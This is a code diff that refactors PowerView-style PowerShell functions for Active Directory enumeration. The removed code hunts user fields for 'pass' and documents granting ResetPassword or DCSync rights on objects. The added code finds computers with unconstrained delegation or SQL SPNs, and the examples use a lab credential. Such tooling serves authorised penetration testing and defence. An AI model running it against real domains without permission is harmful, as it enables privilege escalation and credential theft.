-        User field to search, default of "description".
+Specifies the domain to use for the query, defaults to the current domain.
 
-    .PARAMETER ADSpath
+.PARAMETER Server
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .PARAMETER Domain
+.PARAMETER ResultPageSize
 
-        Domain to search computer fields for, defaults to the current domain.
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER DomainController
+.PARAMETER ServerTimeLimit
 
-        Domain controller to reflect LDAP queries through.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER PageSize
+.PARAMETER Credential
 
-        The PageSize to set for the LDAP searcher object.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER Credential
+.OUTPUTS
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Hashtable
 
-    .EXAMPLE
+Ouputs a hashtable containing a GUID -> Readable Name mapping.
 
-        PS C:\> Find-UserField -SearchField info -SearchTerm backup
+.LINK
 
-        Find user accounts with "backup" in the "info" field.
+http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType([Hashtable])]
     [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
-        [String]
-        $SearchTerm = 'pass',
-
-        [String]
-        $SearchField = 'description',
-
-        [String]
-        $ADSpath,
-
+    Param (
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $DomainController,
+        $Server,
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
- 
-    Get-NetUser -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter "($SearchField=*$SearchTerm*)" -PageSize $PageSize | Select-Object samaccountname,$SearchField
+
+    $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'}
+
+    $ForestArguments = @{}
+    if ($PSBoundParameters['Credential']) { $ForestArguments['Credential'] = $Credential }
+
+    try {
+        $SchemaPath = (Get-Forest @ForestArguments).schema.name
+    }
+    catch {
+        throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest'
+    }
+    if (-not $SchemaPath) {
+        throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest'
+    }
+
+    $SearcherArguments = @{
+        'SearchBase' = $SchemaPath
+        'LDAPFilter' = '(schemaIDGUID=*)'
+    }
+    if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+    if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+    if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+    if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+    if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+    $SchemaSearcher = Get-DomainSearcher @SearcherArguments
+
+    if ($SchemaSearcher) {
+        try {
+            $Results = $SchemaSearcher.FindAll()
+            $Results | Where-Object {$_} | ForEach-Object {
+                $GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0]
+            }
+            if ($Results) {
+                try { $Results.dispose() }
+                catch {
+                    Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_"
+                }
+            }
+            $SchemaSearcher.dispose()
+        }
+        catch {
+            Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_"
+        }
+    }
+
+    $SearcherArguments['SearchBase'] = $SchemaPath.replace('Schema','Extended-Rights')
+    $SearcherArguments['LDAPFilter'] = '(objectClass=controlAccessRight)'
+    $RightsSearcher = Get-DomainSearcher @SearcherArguments
+
+    if ($RightsSearcher) {
+        try {
+            $Results = $RightsSearcher.FindAll()
+            $Results | Where-Object {$_} | ForEach-Object {
+                $GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0]
+            }
+            if ($Results) {
+                try { $Results.dispose() }
+                catch {
+                    Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_"
+                }
+            }
+            $RightsSearcher.dispose()
+        }
+        catch {
+            Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_"
+        }
+    }
+
+    $GUIDs
 }
 
 
-filter Get-UserEvent {
+function Get-DomainComputer {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Dump and parse security events relating to an account logon (ID 4624)
-        or a TGT request event (ID 4768). Intended to be used and tested on
-        Windows 2008 Domain Controllers.
-        Admin Reqd? YES
+Return all computers or specific computer objects in AD.
 
-        Author: @sixdub
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty  
 
-    .PARAMETER ComputerName
+.DESCRIPTION
 
-        The computer to get events from. Default: Localhost
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all computer objects for
+the current domain are returned.
 
-    .PARAMETER EventType
+.PARAMETER Identity
 
-        Either 'logon', 'tgt', or 'all'. Defaults: 'logon'
+A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g. windows10.testlab.local). Wildcards accepted.
 
-    .PARAMETER DateStart
+.PARAMETER Unconstrained
 
-        Filter out all events before this date. Default: 5 days
+Switch. Return computer objects that have unconstrained delegation.
 
-    .PARAMETER Credential
+.PARAMETER TrustedToAuth
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Switch. Return computer objects that are trusted to authenticate for other principals.
 
-    .EXAMPLE
+.PARAMETER Printers
 
-        PS C:\> Get-UserEvent -ComputerName DomainController.testlab.local
+Switch. Return only printers.
 
-    .LINK
+.PARAMETER SPN
 
-        http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/
-#>
+Return computers with a specific service principal name, wildcards accepted.
 
-    Param(
-        [Parameter(ValueFromPipeline=$True)]
-        [String]
-        $ComputerName = $Env:ComputerName,
+.PARAMETER OperatingSystem
 
-        [String]
-        [ValidateSet("logon","tgt","all")]
-        $EventType = "logon",
+Return computers with a specific operating system, wildcards accepted.
 
-        [DateTime]
-        $DateStart = [DateTime]::Today.AddDays(-5),
+.PARAMETER ServicePack
 
-        [Management.Automation.PSCredential]
-        $Credential
-    )
+Return computers with a specific service pack, wildcards accepted.
 
-    if($EventType.ToLower() -like "logon") {
-        [Int32[]]$ID = @(4624)
-    }
-    elseif($EventType.ToLower() -like "tgt") {
-        [Int32[]]$ID = @(4768)
-    }
-    else {
-        [Int32[]]$ID = @(4624, 4768)
-    }
+.PARAMETER SiteName
 
-    if($Credential) {
-        Write-Verbose "Using alternative credentials"
-        $Arguments = @{
-            'ComputerName' = $ComputerName;
-            'Credential' = $Credential;
-            'FilterHashTable' = @{ LogName = 'Security'; ID=$ID; StartTime=$DateStart};
-            'ErrorAction' = 'SilentlyContinue';
-        }
-    }
-    else {
-        $Arguments = @{
-            'ComputerName' = $ComputerName;
-            'FilterHashTable' = @{ LogName = 'Security'; ID=$ID; StartTime=$DateStart};
-            'ErrorAction' = 'SilentlyContinue';            
-        }
-    }
+Return computers in the specific AD Site name, wildcards accepted.
 
-    # grab all events matching our filter for the specified host
-    Get-WinEvent @Arguments | ForEach-Object {
+.PARAMETER Ping
 
-        if($ID -contains 4624) {    
-            # first parse and check the logon event type. This could be later adapted and tested for RDP logons (type 10)
-            if($_.message -match '(?s)(?<=Logon Type:).*?(?=(Impersonation Level:|New Logon:))') {
-                if($Matches) {
-                    $LogonType = $Matches[0].trim()
-                    $Matches = $Null
-                }
-            }
-            else {
-                $LogonType = ""
-            }
+Switch. Ping each host to ensure it's up before enumerating.
 
-            # interactive logons or domain logons
-            if (($LogonType -eq 2) -or ($LogonType -eq 3)) {
-                try {
-                    # parse and store the account used and the address they came from
-                    if($_.message -match '(?s)(?<=New Logon:).*?(?=Process Information:)') {
-                        if($Matches) {
-                            $UserName = $Matches[0].split("`n")[2].split(":")[1].trim()
-                            $Domain = $Matches[0].split("`n")[3].split(":")[1].trim()
-                            $Matches = $Null
-                        }
-                    }
-                    if($_.message -match '(?s)(?<=Network Information:).*?(?=Source Port:)') {
-                        if($Matches) {
-                            $Address = $Matches[0].split("`n")[2].split(":")[1].trim()
-                            $Matches = $Null
-                        }
-                    }
+.PARAMETER Domain
 
-                    # only add if there was account information not for a machine or anonymous logon
-                    if ($UserName -and (-not $UserName.endsWith('$')) -and ($UserName -ne 'ANONYMOUS LOGON')) {
-                        $LogonEventProperties = @{
-                            'Domain' = $Domain
-                            'ComputerName' = $ComputerName
-                            'Username' = $UserName
-                            'Address' = $Address
-                            'ID' = '4624'
-                            'LogonType' = $LogonType
-                            'Time' = $_.TimeCreated
-                        }
-                        New-Object -TypeName PSObject -Property $LogonEventProperties
-                    }
-                }
-                catch {
-                    Write-Verbose "Error parsing event logs: $_"
-                }
-            }
-        }
-        if($ID -contains 4768) {
-            # the TGT event type
-            try {
-                if($_.message -match '(?s)(?<=Account Information:).*?(?=Service Information:)') {
-                    if($Matches) {
-                        $Username = $Matches[0].split("`n")[1].split(":")[1].trim()
-                        $Domain = $Matches[0].split("`n")[2].split(":")[1].trim()
-                        $Matches = $Null
-                    }
-                }
+Specifies the domain to use for the query, defaults to the current domain.
 
-                if($_.message -match '(?s)(?<=Network Information:).*?(?=Additional Information:)') {
-                    if($Matches) {
-                        $Address = $Matches[0].split("`n")[1].split(":")[-1].trim()
-                        $Matches = $Null
-                    }
-                }
+.PARAMETER LDAPFilter
 
-                $LogonEventProperties = @{
-                    'Domain' = $Domain
-                    'ComputerName' = $ComputerName
-                    'Username' = $UserName
-                    'Address' = $Address
-                    'ID' = '4768'
-                    'LogonType' = ''
-                    'Time' = $_.TimeCreated
-                }
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-                New-Object -TypeName PSObject -Property $LogonEventProperties
-            }
-            catch {
-                Write-Verbose "Error parsing event logs: $_"
-            }
-        }
-    }
-}
+.PARAMETER Properties
 
+Specifies the properties of the output object to retrieve from the server.
 
-function Get-ObjectAcl {
-<#
-    .SYNOPSIS
-        Returns the ACLs associated with a specific active directory object.
+.PARAMETER SearchBase
 
-        Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-    .PARAMETER SamAccountName
+.PARAMETER Server
 
-        Object name to filter for.        
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .PARAMETER Name
+.PARAMETER SearchScope
 
-        Object name to filter for.
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-    .PARAMETER DistinguishedName
+.PARAMETER ResultPageSize
 
-        Object distinguished name to filter for.
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER ResolveGUIDs
+.PARAMETER ServerTimeLimit
 
-        Switch. Resolve GUIDs to their display names.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER Filter
+.PARAMETER SecurityMasks
 
-        A customized ldap filter string to use, e.g. "(description=*admin*)"
-     
-    .PARAMETER ADSpath
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.PARAMETER Tombstone
 
-    .PARAMETER ADSprefix
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        Prefix to set for the searcher (like "CN=Sites,CN=Configuration")
+.PARAMETER FindOne
 
-    .PARAMETER RightsFilter
+Only return one result object.
 
-        Only return results with the associated rights, "All", "ResetPassword","WriteMembers"
+.PARAMETER Credential
 
-    .PARAMETER Domain
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        The domain to use for the query, defaults to the current domain.
+.PARAMETER Raw
 
-    .PARAMETER DomainController
+Switch. Return raw results instead of translating the fields into a custom PSObject.
 
-        Domain controller to reflect LDAP queries through.
+.EXAMPLE
 
-    .PARAMETER PageSize
+Get-DomainComputer
 
-        The PageSize to set for the LDAP searcher object.
+Returns the current computers in current domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-ObjectAcl -SamAccountName matt.admin -domain testlab.local
-        
-        Get the ACLs for the matt.admin user in the testlab.local domain
+Get-DomainComputer -SPN mssql* -Domain testlab.local
 
-    .EXAMPLE
+Returns all MS SQL servers in the testlab.local domain.
 
-        PS C:\> Get-ObjectAcl -SamAccountName matt.admin -domain testlab.local -ResolveGUIDs
-        
-        Get the ACLs for the matt.admin user in the testlab.local domain and
-        resolve relevant GUIDs to their display names.
+.EXAMPLE
 
-    .EXAMPLE
+Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained
 
-        PS C:\> Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs
+Search the specified OU for computeres that allow unconstrained delegation.
 
-        Enumerate the ACL permissions for all OUs in the domain.
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainComputer -Credential $Cred
+
+.OUTPUTS
+
+PowerView.Computer
+
+Custom PSObject with translated computer property fields.
+
+PowerView.Computer.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
 #>
 
+    [OutputType('PowerView.Computer')]
+    [OutputType('PowerView.Computer.Raw')]
     [CmdletBinding()]
     Param (
-        [Parameter(ValueFromPipelineByPropertyName=$True)]
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('SamAccountName', 'Name', 'DNSHostName')]
+        [String[]]
+        $Identity,
+
+        [Switch]
+        $Unconstrained,
+
+        [Switch]
+        $TrustedToAuth,
+
+        [Switch]
+        $Printers,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('ServicePrincipalName')]
         [String]
-        $SamAccountName,
+        $SPN,
 
-        [Parameter(ValueFromPipelineByPropertyName=$True)]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $Name = "*",
+        $OperatingSystem,
 
-        [Parameter(ValueFromPipelineByPropertyName=$True)]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $DistinguishedName = "*",
+        $ServicePack,
+
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $SiteName,
 
         [Switch]
-        $ResolveGUIDs,
+        $Ping,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $Filter,
+        $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $ADSpath,
+        $LDAPFilter,
 
-        [String]
-        $ADSprefix,
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        [ValidateSet("All","ResetPassword","WriteMembers")]
-        $RightsFilter,
+        $SearchBase,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $Domain,
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $DomainController,
+        $SearchScope = 'Subtree',
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200
-    )
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
-    begin {
-        $Searcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -ADSprefix $ADSprefix -PageSize $PageSize 
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
 
-        # get a GUID -> name mapping
-        if($ResolveGUIDs) {
-            $GUIDs = Get-GUIDMap -Domain $Domain -DomainController $DomainController -PageSize $PageSize
-        }
+        [Switch]
+        $Tombstone,
+
+        [Alias('ReturnOne')]
+        [Switch]
+        $FindOne,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
+
+        [Switch]
+        $Raw
+    )
+
+    BEGIN {
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $CompSearcher = Get-DomainSearcher @SearcherArguments
     }
 
-    process {
+    PROCESS {
+        if ($CompSearcher) {
 
-        if ($Searcher) {
+            $IdentityFilter = ''
+            $Filter = ''
+            $Identity | Where-Object {$_} | ForEach-Object {
+                $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+                if ($IdentityInstance -match '^S-1-') {
+                    $IdentityFilter += "(objectsid=$IdentityInstance)"
+                }
+                elseif ($IdentityInstance -match '^CN=') {
+                    $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+                }
+                elseif ($IdentityInstance.Contains('.')) {
+                    $IdentityFilter += "(|(name=$IdentityInstance)(dnshostname=$IdentityInstance))"
+                }
+                elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+                    $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+                    $IdentityFilter += "(objectguid=$GuidByteString)"
+                }
+                else {
+                    $IdentityFilter += "(name=$IdentityInstance)"
+                }
+            }
+            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+                $Filter += "(|$IdentityFilter)"
+            }
 
-            if($SamAccountName) {
-                $Searcher.filter="(&(samaccountname=$SamAccountName)(name=$Name)(distinguishedname=$DistinguishedName)$Filter)"  
+            if ($PSBoundParameters['Unconstrained']) {
+                Write-Verbose '[Get-DomainComputer] Searching for computers with for unconstrained delegation'
+                $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
             }
-            else {
-                $Searcher.filter="(&(name=$Name)(distinguishedname=$DistinguishedName)$Filter)"  
+            if ($PSBoundParameters['TrustedToAuth']) {
+                Write-Verbose '[Get-DomainComputer] Searching for computers that are trusted to authenticate for other principals'
+                $Filter += '(msds-allowedtodelegateto=*)'
+            }
+            if ($PSBoundParameters['Printers']) {
+                Write-Verbose '[Get-DomainComputer] Searching for printers'
+                $Filter += '(objectCategory=printQueue)'
+            }
+            if ($PSBoundParameters['SPN']) {
+                Write-Verbose "[Get-DomainComputer] Searching for computers with SPN: $SPN"
+                $Filter += "(servicePrincipalName=$SPN)"
+            }
+            if ($PSBoundParameters['OperatingSystem']) {
+                Write-Verbose "[Get-DomainComputer] Searching for computers with operating system: $OperatingSystem"
+                $Filter += "(operatingsystem=$OperatingSystem)"
+            }
+            if ($PSBoundParameters['ServicePack']) {
+                Write-Verbose "[Get-DomainComputer] Searching for computers with service pack: $ServicePack"
+                $Filter += "(operatingsystemservicepack=$ServicePack)"
+            }
+            if ($PSBoundParameters['SiteName']) {
+                Write-Verbose "[Get-DomainComputer] Searching for computers with site name: $SiteName"
+                $Filter += "(serverreferencebl=$SiteName)"
+            }
+            if ($PSBoundParameters['LDAPFilter']) {
+                Write-Verbose "[Get-DomainComputer] Using additional LDAP filter: $LDAPFilter"
+                $Filter += "$LDAPFilter"
             }
-  
-            try {
-                $Results = $Searcher.FindAll()
-                $Results | Where-Object {$_} | ForEach-Object {
-                    $Object = [adsi]($_.path)
 
-                    if($Object.distinguishedname) {
-                        $Access = $Object.PsBase.ObjectSecurity.access
-                        $Access | ForEach-Object {
-                            $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]
+            $CompSearcher.filter = "(&(samAccountType=805306369)$Filter)"
+            Write-Verbose "[Get-DomainComputer] Get-DomainComputer filter string: $($CompSearcher.filter)"
 
-                            if($Object.objectsid[0]){
-                                $S = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value
-                            }
-                            else {
-                                $S = $Null
-                            }
-                            
-                            $_ | Add-Member NoteProperty 'ObjectSID' $S
-                            $_
-                        }
-                    }
-                } | ForEach-Object {
-                    if($RightsFilter) {
-                        $GuidFilter = Switch ($RightsFilter) {
-                            "ResetPassword" { "00299570-246d-11d0-a768-00aa006e0529" }
-                            "WriteMembers" { "bf9679c0-0de6-11d0-a285-00aa003049e2" }
-                            Default { "00000000-0000-0000-0000-000000000000"}
-                        }
-                        if($_.ObjectType -eq $GuidFilter) { $_ }
+            if ($PSBoundParameters['FindOne']) { $Results = $CompSearcher.FindOne() }
+            else { $Results = $CompSearcher.FindAll() }
+            $Results | Where-Object {$_} | ForEach-Object {
+                $Up = $True
+                if ($PSBoundParameters['Ping']) {
+                    $Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname
+                }
+                if ($Up) {
+                    if ($PSBoundParameters['Raw']) {
+                        # return raw result objects
+                        $Computer = $_
+                        $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer.Raw')
                     }
                     else {
-                        $_
+                        $Computer = Convert-LDAPProperty -Properties $_.Properties
+                        $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer')
                     }
-                } | ForEach-Object {
-                    if($GUIDs) {
-                        # if we're resolving GUIDs, map them them to the resolved hash table
-                        $AclProperties = @{}
-                        $_.psobject.properties | ForEach-Object {
-                            if( ($_.Name -eq 'ObjectType') -or ($_.Name -eq 'InheritedObjectType') ) {
-                                try {
-                                    $AclProperties[$_.Name] = $GUIDS[$_.Value.toString()]
-                                }
-                                catch {
-                                    $AclProperties[$_.Name] = $_.Value
-                                }
-                            }
-                            else {
-                                $AclProperties[$_.Name] = $_.Value
-                            }
-                        }
-                        New-Object -TypeName PSObject -Property $AclProperties
-                    }
-                    else { $_ }
+                    $Computer
                 }
-                $Results.dispose()
-                $Searcher.dispose()
             }
-            catch {
-                Write-Warning $_
+            if ($Results) {
+                try { $Results.dispose() }
+                catch {
+                    Write-Verbose "[Get-DomainComputer] Error disposing of the Results object: $_"
+                }
             }
+            $CompSearcher.dispose()
         }
     }
 }
 
 
-function Add-ObjectAcl {
+function Get-DomainObject {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Adds an ACL for a specific active directory object.
-        
-        AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3)
-            https://adsecurity.org/?p=1906
+Return all (or specified) domain objects in AD.
 
-        ACE setting method adapted from https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName  
 
-        'ResetPassword' doesn't need to know the user's current password
-        'WriteMembers' allows for the modification of group membership
+.DESCRIPTION
 
-    .PARAMETER TargetSamAccountName
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all objects for
+the current domain are returned.
 
-        Target object name to filter for.        
+.PARAMETER Identity
 
-    .PARAMETER TargetName
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
 
-        Target object name to filter for.
+.PARAMETER Domain
 
-    .PARAMETER TargetDistinguishedName
+Specifies the domain to use for the query, defaults to the current domain.
 
-        Target object distinguished name to filter for.
+.PARAMETER LDAPFilter
 
-    .PARAMETER TargetFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-        A customized ldap filter string to use to find a target, e.g. "(description=*admin*)"
+.PARAMETER Properties
 
-    .PARAMETER TargetADSpath
+Specifies the properties of the output object to retrieve from the server.
 
-        The LDAP source for the target, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+.PARAMETER SearchBase
 
-    .PARAMETER TargetADSprefix
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        Prefix to set for the target searcher (like "CN=Sites,CN=Configuration")
+.PARAMETER Server
 
-    .PARAMETER PrincipalSID
+Specifies an Active Directory server (domain controller) to bind to.
 
-        The SID of the principal object to add for access.
+.PARAMETER SearchScope
 
-    .PARAMETER PrincipalName
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        The name of the principal object to add for access.
+.PARAMETER ResultPageSize
 
-    .PARAMETER PrincipalSamAccountName
+Specifies the PageSize to set for the LDAP searcher object.
 
-        The samAccountName of the principal object to add for access.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER Rights
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Rights to add for the principal, "All","ResetPassword","WriteMembers","DCSync"
+.PARAMETER SecurityMasks
 
-    .PARAMETER Domain
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
 
-        The domain to use for the target query, defaults to the current domain.
+.PARAMETER Tombstone
 
-    .PARAMETER DomainController
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER FindOne
 
-    .PARAMETER PageSize
+Only return one result object.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER Credential
 
-    .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName john
+.PARAMETER Raw
 
-        Grants 'john' all full access rights to the 'matt' account.
+Switch. Return raw results instead of translating the fields into a custom PSObject.
 
-    .EXAMPLE
+.EXAMPLE
 
-        Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName john -Rights ResetPassword
+Get-DomainObject -Domain testlab.local
 
-        Grants 'john' the right to reset the password for the 'matt' account.
+Return all objects for the testlab.local domain
 
-    .LINK
+.EXAMPLE
 
-        https://adsecurity.org/?p=1906
-        
-        https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell
-#>
+'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname
 
-    [CmdletBinding()]
-    Param (
-        [String]
-        $TargetSamAccountName,
+distinguishedname
+-----------------
+CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local
+CN=dfm,CN=Users,DC=testlab,DC=local
+OU=OU3,DC=testlab,DC=local
+CN=dfm (admin),CN=Users,DC=testlab,DC=local
 
-        [String]
-        $TargetName = "*",
+.EXAMPLE
 
-        [Alias('DN')]
-        [String]
-        $TargetDistinguishedName = "*",
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObject -Credential $Cred -Identity 'windows1'
 
-        [String]
-        $TargetFilter,
+.EXAMPLE
 
-        [String]
-        $TargetADSpath,
+Get-Domain | Select-Object -Expand name
+testlab.local
 
-        [String]
-        $TargetADSprefix,
+'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainUser] Extracted domain 'testlab.local' from 'testlab\harmj0y'
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
 
-        [String]
-        [ValidatePattern('^S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+')]
-        $PrincipalSID,
+distinguishedname
+-----------------
+CN=harmj0y,CN=Users,DC=testlab,DC=local
